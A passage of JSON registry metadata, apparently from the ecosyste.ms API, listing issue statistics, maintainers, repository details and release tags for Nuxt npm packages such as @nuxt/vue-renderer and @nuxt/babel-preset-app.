ull,"issue_metadata":{"last_synced_at":"2024-09-07T20:15:38.819Z","issues_count":5600,"pull_requests_count":3061,"avg_time_to_close_issue":9598820.406109164,"avg_time_to_close_pull_request":917616.7577526451,"issues_closed_count":3975,"pull_requests_closed_count":2739,"pull_request_authors_count":426,"issue_authors_count":2527,"avg_comments_per_issue":5.092142857142857,"avg_comments_per_pull_request":2.125449199607971,"merged_pull_requests_count":2441,"bot_issues_count":1,"bot_pull_requests_count":1030,"past_year_issues_count":3007,"past_year_pull_requests_count":2334,"past_year_avg_time_to_close_issue":1435446.9934823092,"past_year_avg_time_to_close_pull_request":302464.36299100803,"past_year_issues_closed_count":2134,"past_year_pull_requests_closed_count":2111,"past_year_pull_request_authors_count":336,"past_year_issue_authors_count":1536,"past_year_avg_comments_per_issue":3.426671100764882,"past_year_avg_comments_per_pull_request":2.1032562125107113,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":817,"past_year_merged_pull_requests_count":1921,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":775,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":220,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":124,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":74,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"userquin","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"warflash","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"wattanx","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"atinux","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":565,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":161,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"pi0","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"BobbieGoede","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"Atinux","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"dargmuesli","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"warflash","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"madebyfabian","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"atinux","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-renderer/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-renderer/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-renderer/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-renderer/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-renderer/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-renderer/codemeta","maintainers":[{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-20T21:02:40.350Z","updated_at":"2022-11-20T21:02:40.350Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2022-11-20T21:02:40.339Z","updated_at":"2022-11-20T21:02:40.339Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-20T21:02:40.345Z","updated_at":"2022-11-20T21:02:40.345Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-20T21:02:40.363Z","updated_at":"2022-11-20T21:02:40.363Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:25:39.744Z","updated_at":"2023-08-19T18:25:39.744Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096067,"name":"@nuxt/babel-preset-app","ecosystem":"npm","description":"babel-preset-app for nuxt","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":67,"first_release_published_at":"2018-11-16T14:15:37.242Z","latest_release_published_at":"2024-06-28T11:34:00.626Z","latest_release_number":"2.18.1","last_synced_at":"2026-05-11T01:23:11.179Z","created_at":"2022-04-08T10:39:20.345Z","updated_at":"2026-05-11T01:23:11.179Z","registry_url":"https://www.npmjs.com/package/@nuxt/babel-preset-app","install_command":"npm install @nuxt/babel-preset-app","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"2x":"2.16.2","latest":"2.18.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nux